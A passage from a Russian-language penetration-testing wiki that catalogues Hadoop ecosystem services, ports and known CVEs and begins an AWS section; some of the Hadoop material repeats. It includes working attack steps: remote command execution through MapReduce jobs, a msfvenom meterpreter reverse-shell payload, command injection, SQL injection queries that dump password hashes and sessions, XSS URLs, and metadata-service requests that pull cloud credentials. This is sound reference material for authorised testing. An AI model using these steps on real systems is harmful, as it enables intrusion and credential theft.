Порт: 13562

Протокол: HTTP

Аутентификация: ???

Параметр конфига: mapreduce.shuffle.port

=== Jobhistory Shufflee WebUI ===

Порт: 19890

Протокол: HTTPS

Аутентификация: ???

Параметр конфига: mapreduce.jobhistory.webapp.https.address

=== TaskTracker WebUI v1 ===

Порт: 50060

Протокол: HTTP

Аутентификация: ???

Параметр конфига: mapred.task.tracker.http.address

Доступно только в MapReduce v1

=== History Server WebUI ===

Порт: 51111

Протокол: HTTP

Аутентификация: ???

Параметр конфига: mapreduce.history.server.http.address

= Cloudera =

Экосистема Hadoop от компании Cloudera

== Сервисы ==

=== HUE ===

Работает на порту 8888 по протоколу HTTP.

==== Уязвимости ====

* CVE-2016-4947 - вычисление пользователей из непривилегированного аккаунта (версия меньше или равна 3.9.0):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:auto" >
/desktop/api/users/autocomplete
</syntaxhighlight>

* CVE-2016-4946 - хранимая XSS (версия меньше или равна 3.9.0). Находится во вкладке Hue Users - Edit user в полях First name и Last name.

* Open redirect (версия меньше или равна 3.9.0).
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:auto" >
/accounts/login/?next=//[domain_name]
</syntaxhighlight>

=== Manager ===

Работает на порту 7180(http) и 7183(https).

==== Уязвимости ====

* Получение списка пользователей (версия меньше или равна 5.5)
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:auto" >
/api/v1/users
</syntaxhighlight>

* Вычисление пользовательских сессий из непривилегированного аккаунта (CVE-2016-4950) (версия меньше или равна 5.5):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:auto" >
/api/v1/users/sessions
</syntaxhighlight>

* Доступ к логам процесса(process_id можно перебрать) (версия меньше или равна 5.5):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:auto" >
/cmf/process/<process_id>/logs?filename={stderr,stdout}.log
</syntaxhighlight>

* CVE-2016-4948 - Stored XSS (версия меньше или равна 5.5)

* CVE-2016-4948 - Reflected XSS (версия меньше или равна 5.5):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:auto" >
/cmf/cloudera-director/redirect?classicWizard=[XSS]&clusterid=1
</syntaxhighlight>

= Утилиты =

== Hadoop Attack Library ==

https://github.com/wavestone-cdt/hadoop-attack-library

=== hadoopsnooper.py ===
https://github.com/wavestone-cdt/hadoop-attack-library/blob/master/Tools%20Techniques%20and%20Procedures/Getting%20the%20target%20environment%20configuration/

Скрипт для получения конфига hadoop

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:auto" >
python hadoopsnooper.py 192.168.38.28 --nn hdfs://192.168.38.128:8020
</syntaxhighlight>

=== hdfsbrowser.py ===

https://github.com/wavestone-cdt/hadoop-attack-library/tree/master/Tools%20Techniques%20and%20Procedures/Browsing%20the%20HDFS%20datalake

Скрипт для рааботы с WebHDFS. В скрипте также можно указать порт, протокол
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:auto" >
python hdfsbrowser.py 10.10.10.10
</syntaxhighlight>

= Ссылки =

== Видео ==

== Статьи ==

== Презентации ==

https://2015.zeronights.org/assets/files/03-Kaluzny.pdf

https://2016.zeronights.ru/wp-content/uploads/2016/12/Wavestone-ZeroNights-2016-Hadoop-safari-Hunting-for-vulnerabilities-v1.0.pdf

Hadoop

2022-09-16T11:57:06Z

Drakylar: /* = Admin service */

= Общее =

== Получение конфига ==

Несколько вариантов получения конфига Hadoop. Он может потребоваться для работы с ним через CLI. Конфиг обычно в формате XML.

=== Сервисы ===

==== WebUI ====

Для этого требуется перейти на один из следующих веб серверов на страницу /conf:

* HDFS WebUI (много потов)
* JobHistory (19888, 19890) - в приоритете
* ResourceManager (8088, 8090)
. . .

=== Уязвимости ===

Иногда конфиг можно скачать используя уязвимости ПО.

==== Cloudera Manager ====

Конфиг будет доступен по следующему адресу:

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:auto" >
http://<cloudera_mgr_ip>:7180/cmf/services/<service_id_to_iterate>/client-config
</syntaxhighlight>

service_id_to_iterate - можно получить перебором 0-100(или больше).

=== Автоматически ===

==== HadoopSnooper ====

https://github.com/wavestone-cdt/hadoop-attack-library/blob/master/Tools%20Techniques%20and%20Procedures/Getting%20the%20target%20environment%20configuration/hadoopsnooper.py

Позволяет скачать файлы конфига:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:auto" >
python hadoopsnooper.py 192.168.38.28 --nn hdfs://192.168.38.128:8020
</syntaxhighlight>

== Аутентификация ==

По-умолчанию simple (то есть отключена, можно выдавать себя за любого). Можно переключить на kerberos. За это отвечает параметр в конфиге hadoop.security.authentication.

== Шифрование ==

По-умолчанию отключено для передачи (in-transit) и хранения (at-rest).

=== NameNode ===

Для общения с NameNode могут быть использованы следующие механизмы аутентификации:

- GSS-API

- Digest-MD5

=== Web Apps ===

Как правило, используется SSL/TLS.

=== DataNodes ===

Шифрование может быть на 2 уровнях:

1. обмен ключами используя 3DES или RC4

2. Шифрование используя AES 128(default)/192/256.

=== At-rest ===

Означает хранилище файлов. Если кратко:

* Данные шифруются DEK-ключем (Data Encryption Key)

* DEK зашифрован ключем EZ (Encryption Zone) -> EDEK (Encrypted Data Encryption Key)

Обратный процесс:

* EDEK запрашивается у NameNode

* Запрашиваем KMS расшифровать EDEK - получаем DEK

* Расшифровываем или зашифровываем данные с DEK.

Важно! Чтобы запросить ключ у KMS, в случае использования Access Control List (ACL) нужны привилегии.

== Поиск сервисов ==

=== nmap ===

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:auto" >
nmap -sV -Pn --open -v -p ПОРТЫ_ТУТ --scripts "*hadoop* or *hbase* or *flume*" АДРЕСА
</syntaxhighlight>

== Общие атаки ==

=== Node RCE ===

Для этого требуется получить конфиг и настроить hadoop cli.

path_to_hadoop_streaming.jar - файл, который развертывается на нодах. Обычно он уже есть в установленном hadoop-cli по адресу /share/hadoop/tools/lib/hadoop-streaming-2.7.3.jar

Создаем задачу MapReduce:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:auto" >
hadoop jar <path_to_hadoop_streaming.jar> \
-input /non_empty_file_on_HDFS \
-output /output_directory_on_HDFS \
-mapper "/bin/cat /etc/passwd" \
-reducer NONE
</syntaxhighlight>

Читаем результат команды:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:auto" >
hadoop fs –ls /output_directory_on_HDFS
hadoop fs –cat /output_directory_on_HDFS/part-00000
</syntaxhighlight>

Также результат команды можно увидеть в WebUI в консоли созданной задачи.

Из интересного: нельзя выбрать ноду, на которой запускается задача. Поэтому требуется запускать команду много раз, пока она не запустится на нужной.

Бонус: эксплоит можно сгенерировать с msfvenom:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:auto" >
msfvenom -a x86 --platform linux -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.38.1 -f elf -o msf.payload

hadoop jar <path_to_hadoop_streaming.jar>
-input /non_empty_file_on_HDFS \
-output /output_directory_on_HDFS \
-mapper "./msf.payload" \
-reducer NONE \
-file msf.payload \
-background
</syntaxhighlight>

=== RCE - CVE-2016-5393 ===

'''Уязвимая версия:''' Hadoop 2.6.x < 2.6.5 and 2.7.x < 2.7.3

'''Требования:''' должен быть авторизован и у кластера должны быть включены параметры "org.apache.hadoop.security.ShellBasedUnixGroupsMapping" и "hadoop.security.group.mapping" (конфиг core-site.xml)

Cуть в том, что функция получения групп для пользователя не экранирует специальные символы и вставляет строку в "bash -c":
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:auto" >
hdfs groups '$(ping 127.0.0.1)'
</syntaxhighlight>

Второй вариант - через WebHDFS. Но для этого требуется "Simple Auth":
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:auto" >
.../?user.name=$(ping+127.0.0.1)
</syntaxhighlight>

Подробнее: https://github.com/wavestone-cdt/hadoop-attack-library/tree/master/Hadoop%20components%20vulnerabilities/Hadoop%20Common/CVE-2016-5393%20-%20Authenticated%20command%20execution%20as%20the%20hdfs%20user

= HDFS =

HDFS (Hadoop FileSystem) - это виртуальная файловая система Hadoop, доступная по сети.

== Сервисы ==

=== MasterNode (NameNode) WebUI ===

Это веб-интерфейс, запущенный на портах 50070(http) и 50470(https). Обычно на нем отсутствует аутентификация, поэтому его можно использовать для доступа к файловой системе.

Основная страница доступна по адресу /explorer.html, а при выборе даты перенаправляет на соответствующую DataNode (порт 50075).

=== MasterNode Metadata Service ===

Использует протокол IPC на портах 8020 и 9000. Требуется для взаимодействия с метадатой файлов HDFS.

Команды для взаимодействия:

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:auto" >
# Получение списка файлов (и их метадаты)
hadoop fs -ls /tmp
</syntaxhighlight>

=== DataNode WebUI ===

Веб-интерфейс для доступа к статусу, логам и тд. Запускается на 50075(http) и 50475(https) портах.

Доступно по пути /browseDirectory.jsp

==== hdfsbrowser.py ====
Для взаимодействия с ним можно воспользоваться скриптом https://github.com/wavestone-cdt/hadoop-attack-library/tree/master/Tools%20Techniques%20and%20Procedures/Browsing%20the%20HDFS%20datalake :

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:auto" >
# В скрипте также можно указать порт, протокол
python hdfsbrowser.py 10.10.10.10
</syntaxhighlight>

Интересно, что утилита автоматически подставляет нужного пользователя - владельца файла или ноды.

==== hadoop cli ====

Для получения списка файлов требуется в переменной окружения "HADOOP_USER_NAME" указать нужного пользователя, например, root или hbase:

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:auto" >
export HADOOP_USER_NAME=hbase
hadoop fs -ls /hbase
hadoop fs –cat /output_directory_on_HDFS/part-00000
</syntaxhighlight>

Для этого может потребоваться конфиг hadoop (в основной главе)

=== DataNode Data Transfer ===

Сервис для передачи данных в DataNode. Использует порт 50010

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:auto" >
# Отправить файл на HDFS
hadoop fs -put <localfile> <remotedst>
</syntaxhighlight>

=== DataNode Metadata Service ===

Использует протокол IPC на порту 50020. Требуется для взаимодействия с метадатой файлов HDFS.

=== Secondary Node Checkpoint Service (Secondary NameNode WebUI) ===

Запущен на порту 50090 по протоколу http. Как понял используется для сохранения данных метадаты (запасное хранилище).

= YARN =

== Интерфейсы (сервисы) ==

=== Application Manager ===

Порт(tcp): 8032

Протокол: http

Аутентификация: ???

Параметр в конфиге : yarn.resourcemanager.address

=== Scheduler ===

Порт(tcp): 8030

Протокол: http

Аутентификация: ???

Параметр в конфиге : yarn.resourcemanager.scheduler.address

=== ResourceManager Web Application ===

Порт(tcp): 8088, 8090

Протокол: http(8088), https(8090)

Аутентификация: ???

Параметр в конфиге : yarn.resourcemanager.webapp.address, yarn.resourcemanager.webapp.https.address

=== ResourceManager Tracker ===

Порт(tcp): 8031

Протокол: ???

Аутентификация: ???

Параметр в конфиге : yarn.resourcemanager.resource-tracker.address

=== ResourceManager Admin ===

Порт(tcp): 8033

Протокол: ???

Аутентификация: ???

Параметр в конфиге : yarn.resourcemanager.admin.address

=== NodeManager СontainerManager ===

Порт(tcp): 0

Протокол: ???

Аутентификация: ???

Параметр в конфиге : yarn.nodemanager.address

=== NodeManager Localizer ===

Порт(tcp): 8040

Протокол: ??? (IPC)

Аутентификация: ???

Параметр в конфиге: yarn.nodemanager.localizer.address

=== NodeManager Collector Service ===

Порт(tcp): 8048

Протокол: ??? (IPC)

Аутентификация: ???

Параметр в конфиге: yarn.nodemanager.collector-service.address

=== NodeManager WebUI ===

Порт(tcp): 8042, 8044

Протокол: http(8042), https(8044)

Аутентификация: ???

Параметр в конфиге: yarn.nodemanager.webapp.address, yarn.nodemanager.webapp.https.address

=== NodeManager Timeline RPC ===

Порт(tcp): 10200

Протокол: ???

Аутентификация: ???

Параметр в конфиге: yarn.timeline-service.address

=== NodeManager Timeline WebUI ===

Порт(tcp): 8188, 8190

Протокол: http(8188), https(8190)

Аутентификация: ???

Параметр в конфиге: yarn.timeline-service.webapp.address, yarn.timeline-service.webapp.https.address

=== SharedCacheManager Admin ===

Порт(tcp): 8047

Протокол: ???

Аутентификация: ???

Параметр в конфиге: yarn.sharedcache.admin.address

=== SharedCacheManager WebUI ===

Порт(tcp): 8788

Протокол: ???(http)

Аутентификация: ???

Параметр в конфиге: yarn.sharedcache.webapp.address

=== SharedCacheManager Node Manager ===

Порт(tcp): 8046

Протокол: ???

Аутентификация: ???

Параметр в конфиге: yarn.sharedcache.uploader.server.address

=== SharedCacheManager Client ===

Порт(tcp): 8045

Протокол: ???

Аутентификация: ???

Параметр в конфиге : yarn.sharedcache.client-server.address

=== NodeManager AMRMProxyService ===

Порт(tcp): 8049

Протокол: ???

Аутентификация: ???

Параметр в конфиге : yarn.nodemanager.amrmproxy.address

=== Router WebUI ===

Порт(tcp): 8089, 8091

Протокол: http(8089), https(8091)

Аутентификация: ???

Параметр в конфиге : yarn.router.webapp.address, yarn.router.webapp.https.address

=== HttpFS (Hadoop HDFS over HTTP) ===

Порт(tcp): 14000, 14001

Протокол: http(14000), 14001(https)

Аутентификация: ???

= Apache HBASE =

= ZooKeeper =

= Apache Ambari =

Нужен для упрощения управления кластерами Hadoop, используя WebUI. Есть возможность интегрироваться с другими приложениями по REST API.

Из интересного:

- Все могут авторизоваться (даже стандартные юзеры)

- Нет защиты (directory listing, no cookie flags, no CSRF)

- CVE-2015-1775 - /logs/ логи

== Сервисы ==

=== WebUI ===

Общение по протоколу http (порт 8080) и https (порт 8440).

=== Registration/Heartbeat ===

Общение по протоколу https на порту 8441.

=== Agent ===

Порт 8670/tcp используется для Ping.

= Apache Spark =

= Apache Kafka/Storm =

= Apache HIVE / DRILL =

= Mahout =

= Apache Solr / Lucene =

= Apache Ranger =

Компонент безопасности Hadoop с открытым исходным кодом.

Из интересного:

- Поддержка Kerberos

- REST API

- Журналы аудита

- Модель разрешений на основе политики доступа (политики, юзеры, группы)

Интересные ИБ-проблемы:

- Slow HTTP DOS

- Все юзеры могут авторизоваться в Ranger (но не все - выполнять действия)

- CVE-2015-0266 - Missing function level access control, можно использовать для повышения привилегий

- CVE-2015-0265 - XSS в UserAgent

TODO: изучить как работает

https://ranger.apache.org/apidocs/index.html - API документация

== Сервисы ==

=== Admin WebUI ===

Порт: 6080, 6182

Протокол: http(6180),https(6182)

Параметр конфига: ranger.service.http.port, ranger.service.https.port

==== Уязвимости ====

* Скачивание политик без аутентификации. Но нужно знать имя политики. (версия меньше или равна 0.5.2)
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:auto" >
/service/plugins/policies/download/<policy_name>
</syntaxhighlight>
Подробнее: https://github.com/wavestone-cdt/hadoop-attack-library/tree/master/Third-party%20modules%20vulnerabilities/Apache%20Ranger/Unauthenticated%20policy%20download

* CVE-2016-2174 - SQL injection.
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:auto" >
/service/plugins/policies/eventTime?eventTime=' or '1'='1&policyId=1

# post-exploitation: скачать хеши паролей пользователей (md5 или sha512):
select last_name, first_name, email, login_id, password, user_role from x_portal_user, x_portal_user_role where x_portal_user.id = x_portal_user_role.user_id limit 3

# post-exploitation: скачать сессии(куки) пользователей):
select auth_time, login_id, ext_sess_id from x_auth_sess where auth_status = 1 or (login_id like '%admin%' and auth_status = 1) order by auth_time desc limit 3
</syntaxhighlight>
Подробнее: https://github.com/wavestone-cdt/hadoop-attack-library/tree/master/Third-party%20modules%20vulnerabilities/Apache%20Ranger/CVE-2016-2174%20-%20Authenticated%20SQL%20injection

=== UNIX Auth Service ===

Порт: 5151

Протокол: SSL/TCP

Параметр конфига: ranger.usersync.port

=== Ranger KMS ===

Порт: 9292, 9293

Протокол: http(9292), https(9293)

Параметр конфига: ranger.service.http.port, ranger.service.https.port

=== Solr Audit ===

Порт: 6083, 6183

Протокол: http(6083), https(6183)

Параметр конфига: ranger-admin (???)

= OOZIE =

Серверная система планирования рабочих процессов для управления заданиями Hadoop. Рабочие процессы в Oozie определяются как набор потоков управления и узлов действий в ориентированном ациклическом графе.

== Сервисы ==

=== Web Console ===

Порт: 11000, 11443

Протокол: HTTP(11000), HTTPS(11443)

== Admin service ==

Порт: 11001

Протокол: ???

= PIG =

= Apache Hue =

Облачный редактор SQL с открытым исходным кодом. Упоминается тут тк часто используется вместе с Hadoop. Использует порт 8888 по протоколу HTTP.

В старых версиях также присутствует DOM XSS, включена отладка, есть заголовок X-Frame-Options: ALLOWALL.

= MapReduce =

Модель распределённых вычислений от компании Google, используемая в технологиях Big Data для параллельных вычислений над очень большими (до нескольких петабайт) наборами данных в компьютерных кластерах, и фреймворк для вычисления распределенных задач на узлах (node) кластера

== Сервисы ==

=== Jobhistory ===

Порт: 10020

Протокол: HTTP

Аутентификация: ???

Параметр конфига: mapreduce.jobhistory.address

=== JobTracker ===

Порт: 8021

Протокол: IPC

Аутентификация: ???

Параметр конфига: mapred.job.tracker

Доступно только в MapReduce v1

=== JobTracker WebUI v1 ===

Порт: 50030

Протокол: HTTP

Аутентификация: ???

Параметр конфига: mapred.job.tracker.http.address

Доступно только в MapReduce v1

=== Jobhistory WebUI v2 ===

Порт: 19888, 19890

Протокол: HTTP(19888), HTTPS(19890)

Аутентификация: ???

Параметр конфига: mapreduce.jobhistory.webapp.address, mapreduce.jobhistory.webapp.https.address

Доступен только в MapReduce v2

=== Jobhistory Shufflee ===

Порт: 13562

Протокол: HTTP

Аутентификация: ???

Параметр конфига: mapreduce.shuffle.port

=== Jobhistory Shufflee WebUI ===

Порт: 19890

Протокол: HTTPS

Аутентификация: ???

Параметр конфига: mapreduce.jobhistory.webapp.https.address

=== TaskTracker WebUI v1 ===

Порт: 50060

Протокол: HTTP

Аутентификация: ???

Параметр конфига: mapred.task.tracker.http.address

Доступно только в MapReduce v1

=== History Server WebUI ===

Порт: 51111

Протокол: HTTP

Аутентификация: ???

Параметр конфига: mapreduce.history.server.http.address

= Cloudera =

Экосистема Hadoop от компании Cloudera

== Сервисы ==

=== HUE ===

Работает на порту 8888 по протоколу HTTP.

==== Уязвимости ====

* CVE-2016-4947 - вычисление пользователей из непривилегированного аккаунта (версия меньше или равна 3.9.0):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:auto" >
/desktop/api/users/autocomplete
</syntaxhighlight>

* CVE-2016-4946 - хранимая XSS (версия меньше или равна 3.9.0). Находится во вкладке Hue Users - Edit user в полях First name и Last name.

* Open redirect (версия меньше или равна 3.9.0).
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:auto" >
/accounts/login/?next=//[domain_name]
</syntaxhighlight>

=== Manager ===

Работает на порту 7180(http) и 7183(https).

==== Уязвимости ====

* Получение списка пользователей (версия меньше или равна 5.5)
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:auto" >
/api/v1/users
</syntaxhighlight>

* Вычисление пользовательских сессий из непривилегированного аккаунта (CVE-2016-4950) (версия меньше или равна 5.5):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:auto" >
/api/v1/users/sessions
</syntaxhighlight>

* Доступ к логам процесса(process_id можно перебрать) (версия меньше или равна 5.5):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:auto" >
/cmf/process/<process_id>/logs?filename={stderr,stdout}.log
</syntaxhighlight>

* CVE-2016-4948 - Stored XSS (версия меньше или равна 5.5)

* CVE-2016-4948 - Reflected XSS (версия меньше или равна 5.5):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:auto" >
/cmf/cloudera-director/redirect?classicWizard=[XSS]&clusterid=1
</syntaxhighlight>

= Утилиты =

== Hadoop Attack Library ==

https://github.com/wavestone-cdt/hadoop-attack-library

=== hadoopsnooper.py ===
https://github.com/wavestone-cdt/hadoop-attack-library/blob/master/Tools%20Techniques%20and%20Procedures/Getting%20the%20target%20environment%20configuration/

Скрипт для получения конфига hadoop

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:auto" >
python hadoopsnooper.py 192.168.38.28 --nn hdfs://192.168.38.128:8020
</syntaxhighlight>

=== hdfsbrowser.py ===

https://github.com/wavestone-cdt/hadoop-attack-library/tree/master/Tools%20Techniques%20and%20Procedures/Browsing%20the%20HDFS%20datalake

Скрипт для рааботы с WebHDFS. В скрипте также можно указать порт, протокол
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:auto" >
python hdfsbrowser.py 10.10.10.10
</syntaxhighlight>

= Ссылки =

== Видео ==

== Статьи ==

== Презентации ==

https://2015.zeronights.org/assets/files/03-Kaluzny.pdf

https://2016.zeronights.ru/wp-content/uploads/2016/12/Wavestone-ZeroNights-2016-Hadoop-safari-Hunting-for-vulnerabilities-v1.0.pdf

Aws

2022-09-14T10:45:02Z

Drakylar: /* All-In-One */

AWS - Amazon Web Service. Одна из первых облачных систем, состоящая из многих сервисов, которые при некорректной настройке оставляют дыры в безопасности.

= Организационные моменты =

При проведении тестирования на проникновение, требуется предупредить AWS (составить заявку).

Подробнее тут: https://aws.amazon.com/ru/security/penetration-testing/

= Общие концепции =

== Службы ==

Концепция служб в AWS позволяет автоматизировать многие процессы, включая саму разработку архитектуры.

Это экосистема многих сервисов. И AWS стремится увеличить их количество.

Например, связать сервис сбора логов и сервис по реагированию на инциденты, а результаты класть на сервис S3.

== Регионы ==

AWS разделен на регионы. Часть сервисов кросс-региональные, но большинство привязываются к конкретным регионам.

{| class="wikitable"
|+Регионы AWS
|-
| '''Название региона'''
| '''Endpoint(HTTPS)'''
|-
|us-east-2
|rds.us-east-2.amazonaws.com

rds-fips.us-east-2.api.aws

rds.us-east-2.api.aws

rds-fips.us-east-2.amazonaws.com
|-
|us-east-1
|rds.us-east-1.amazonaws.com

rds-fips.us-east-1.api.aws

rds-fips.us-east-1.amazonaws.com

rds.us-east-1.api.aws
|-
|us-west-1
|rds.us-west-1.amazonaws.com

rds.us-west-1.api.aws

rds-fips.us-west-1.amazonaws.com

rds-fips.us-west-1.api.aws
|-
|us-west-2
|rds.us-west-2.amazonaws.com

rds-fips.us-west-2.amazonaws.com

rds.us-west-2.api.aws

rds-fips.us-west-2.api.aws
|-
|af-south-1
|rds.af-south-1.amazonaws.com

rds.af-south-1.api.aws
|-
|ap-east-1
|rds.ap-east-1.amazonaws.com

rds.ap-east-1.api.aws
|-
|ap-southeast-3
|rds.ap-southeast-3.amazonaws.com
|-
|ap-south-1
|rds.ap-south-1.amazonaws.com

rds.ap-south-1.api.aws
|-
|ap-northeast-3
|rds.ap-northeast-3.amazonaws.com

rds.ap-northeast-3.api.aws
|-
|ap-northeast-2
|rds.ap-northeast-2.amazonaws.com

rds.ap-northeast-2.api.aws
|-
|ap-southeast-1
|rds.ap-southeast-1.amazonaws.com

rds.ap-southeast-1.api.aws
|-
|ap-southeast-2
|rds.ap-southeast-2.amazonaws.com

rds.ap-southeast-2.api.aws
|-
|ap-northeast-1
|rds.ap-northeast-1.amazonaws.com

rds.ap-northeast-1.api.aws
|-
|ca-central-1
|rds.ca-central-1.amazonaws.com

rds.ca-central-1.api.aws

rds-fips.ca-central-1.api.aws

rds-fips.ca-central-1.amazonaws.com
|-
|eu-central-1
|rds.eu-central-1.amazonaws.com

rds.eu-central-1.api.aws
|-
|eu-west-1
|rds.eu-west-1.amazonaws.com

rds.eu-west-1.api.aws
|-
|eu-west-2
|rds.eu-west-2.amazonaws.com

rds.eu-west-2.api.aws
|-
|eu-south-1
|rds.eu-south-1.amazonaws.com

rds.eu-south-1.api.aws
|-
|eu-west-3
|rds.eu-west-3.amazonaws.com

rds.eu-west-3.api.aws
|-
|eu-north-1
|rds.eu-north-1.amazonaws.com

rds.eu-north-1.api.aws
|-
|me-south-1
|rds.me-south-1.amazonaws.com

rds.me-south-1.api.aws
|-
|sa-east-1
|rds.sa-east-1.amazonaws.com

rds.sa-east-1.api.aws
|-
|us-gov-east-1
|rds.us-gov-east-1.amazonaws.com
|-
|us-gov-west-1
|rds.us-gov-west-1.amazonaws.com
|}

Или только регионы (могут пригодиться при переборе):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
us-east-2
us-east-1
us-west-1
us-west-2
af-south-1
ap-east-1
ap-southeast-3
ap-south-1
ap-northeast-3
ap-northeast-2
ap-southeast-1
ap-southeast-2
ap-northeast-1
ca-central-1
eu-central-1
eu-west-1
eu-west-2
eu-south-1
eu-west-3
eu-north-1
me-south-1
sa-east-1
us-gov-east-1
us-gov-west-1
</syntaxhighlight>

== Доступы ==

== Консольная утилита(awscli) ==

Чаще всего для взаимодействия с сервисами AWS вам потребуется консольная утилита awscli.

Утилита работает с настроенными профилями.

=== Файлы ===

==== ~/.aws/credentials ====

Файл с учетными данными профилей. Перефразирую: получив данные из этого файла вы, вероятнее всего, получите контроль над аккаунтами в нем.

У каждого профиля будет указан:

* Access Key ID - 20 случайных букв/цифр в верхнем регистре, часто начинается с "AKIA..."

* Access Key - 40 случайных символов различного регистра.

* Access Token - не всегда указывается

Полный список параметров можно посмотреть тут: https://docs.aws.amazon.com/cli/latest/userguide/cli-configure-files.html#cli-configure-files-settings

Пример содержимого файла (сохранен профиль default):

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
[default]
aws_access_key_id=AKIAIOSFODNN7EXAMPLE
aws_secret_access_key=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
aws_session_token = AQoEXAMPLEH4aoAH0gNCAPyJxz4BlCFFxWNE1OPTgk5TthT+FvwqnKwRcOIfrRh3c/LTo6UDdyJwOOvEVPvLXCrrrUtdnniCEXAMPLE/IvU1dYUg2RVAJBanLiHb4IgRmpRV3zrkuWJOgQs8IZZaIv2BXIa2R4Olgk
</syntaxhighlight>

==== ~/.aws/config ====

Файл с региональными настройками профиля(регион по-умолчанию).
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
[default]
region=us-west-2
output=json
</syntaxhighlight>

==== ~/.aws/cli/cache ====

Закешированные учетные данные

==== ~/.aws/sso/cache ====

Закешированные данные Single-Sign-On

=== Команды ===

Общее построение команды выглядит как:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws <название_сервиса> <действие> <дополнительные_аргументы>
</syntaxhighlight>

Примеры:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Вывести все S3-хранилища.
aws s3 ls

# Создание нового пользователя - сервис IAM
aws iam create-user --user-name aws-admin2
</syntaxhighlight>

== IMDS (Instance Metadata Service) ==

Это http API для запросов из EC2. Полезно если, например, у вас есть уязвимость SSRF в EC2.

Есть 2 версии:

*IMDSv1 - версия 1 по-умолчанию, не требует токен.

*IMDSv2 - версия 2, для запросов требуется токен.

Запрос без токена:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
curl http://169.254.169.254/latest/meta-data/
</syntaxhighlight>

Запрос с токеном:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
TOKEN=`curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600"` && curl -H "X-aws-ec2-metadata-token: $TOKEN" -v http://169.254.169.254/latest/meta-data/
</syntaxhighlight>

Кроме доп. информации можно получить access-token для доступа в AWS с сервисного аккаунта ec2 (только для IMDSv2):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# В начале делаем запрос на директорию /security-credentials/
http://169.254.169.254/latest/meta-data/iam/security-credentials/
# Потом выбираем нужный аккаунт и делаем запрос на него
http://169.254.169.254/latest/meta-data/iam/security-credentials/test-account
</syntaxhighlight>

Пример ответа:
<syntaxhighlight lang="json" line="1" enclose="div" style="overflow-x:scroll" >
{
"Code" : "Success",
"LastUpdated" : "2019-12-03T07:15:34Z",
"Type" : "AWS-HMAC",
"AccessKeyId" : "xxxxxxxxxxxxxxxxxxx",
"SecretAccessKey" : "xxxxxxxxxxxxxxxxxxxxx",
"Token" : "xxxxxxxxxxxxxxxxxxxxx",
"Expiration" : "2019-12-03T13:50:22Z"
}
</syntaxhighlight>
После чего эти учетные данные можно использовать с awscli.

Другие полезные Endpoint'ы:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
http://169.254.169.254/
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/PhotonInstance
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/public-keys/
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
http://169.254.169.254/latest/meta-data/public-keys/[ID]/openssh-key
http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy
http://169.254.169.254/latest/meta-data/iam/security-credentials/s3access
http://169.254.169.254/latest/dynamic/instance-identity/document
</syntaxhighlight>

= Ролевая модель =

Почти все описание доступа идет через ролд. А роли в свою очередь состоят из двух типов политик:

* trust policy - определяет, чья будет роль

* permissions policy - определяет какой доступ будет у тех, у кого эта роль.

Каждая политика состоит из следующих компонентов:

* Ресурс - цель, кому выдается правило. Может быть:
** Пользователь
** Группа, в которой могут быть аккаунты по какому то признаку
** Другая политика.

* Роль(Action) - какое-либо действие (например, iam:ListGroupPolicies - посмотреть список груповых политик)

* Тип правила(Effect) - разрешение или запрет.

* Политика(Policy) - совокупность Роль(действие) -> разрешение/запрет -> Ресурс(кому).

* Условия(Condition) - отдельные условия, например, ip.

Пример политики:
